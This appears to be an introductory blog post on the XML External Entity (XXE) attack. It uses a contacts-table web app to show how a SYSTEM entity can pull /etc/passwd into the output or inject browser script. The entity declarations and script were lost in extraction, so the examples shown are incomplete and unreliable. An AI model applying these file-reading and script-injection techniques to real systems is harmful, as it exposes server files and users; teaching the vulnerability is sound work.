The XXE attack has been around for a few years, but hasn’t gotten much attention until the last couple of years with some high-profile cases in Facebook and PayPal.

So, what is the XML External Entity attack? XXE is an abbreviation for XML External Entity. It is a part of the XML spec that allows a document to have entities that resolve to someplace external (not within the same document).

Some basic examples demonstrate the concept describe it best. For example, let’s say that we have a web app that takes as input an xml file and displays it in a table.

Example 1

Here’s a sample input file-


  <contacts>
    <contact>
      <login>bobw</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

This is processed and displays the following-

login name email
bobw Bob Walker bob@bob.com
ajones Alice Jones alice@alice.com

</body>

Pretty Straightforward, right?


Example 2</p>

Now, let’s take the same example and add an entity-



]>
  <contacts>
    <contact>
      <login>&foo;</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

This processes and displays-

login name email
Foo Bob Walker bob@bob.com
ajones Alice Jones alice@alice.com

What happened? On line 3 of the xml file we created an entity called foo which is the string, “Foo”. We then use that entity, &foo, in place of Bob’s username on line 7. While processing the document the parser substituted “Foo” when it saw &foo;.


Example 3</p>

Now let’s do something really interesting. Consider the following-



]>
  <contacts>
    <contact>
      <login>&foo;</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

This processes and displays-

login name email
root:x:0:0:root:/root:/bin/bash Bob Walker bob@bob.com
ajones Alice Jones alice@alice.com

What did it do? On line 3, the keyword SYSTEM means that this entity reference is external to the document. In this case, the external entity references /etc/passwd on the system that is processing the xml. This causes the contents of /etc/passwd to be pulled into the document and then displayed.


Example 4</p>

Up to this point, the attacks have been against the server. How can we attack the user?

Consider this-



]>
  <contacts>
    <contact>
      <login>&foo;</login>
      <name>Bob Walker</name>
      <email>bob@bob.com</email>
    </contact>
    <contact>
      <login>ajones</login>
      <name>Alice Jones</name>
      <email>alice@alice.com</email>
    </contact>
</contacts>

What do you think the external entity reference does here? It returns . When the table displays that script is executed in the browser. (I’m not displaying the results like in previous examples because it would execute while you are reading this and it’s just an example showing that it’s vulnerable.).

I hope these examples give you a basic understanding of what the XXE vulnerability is. I’ll likely do a follow-up post with more advanced examples soon and how to mitigate it soon.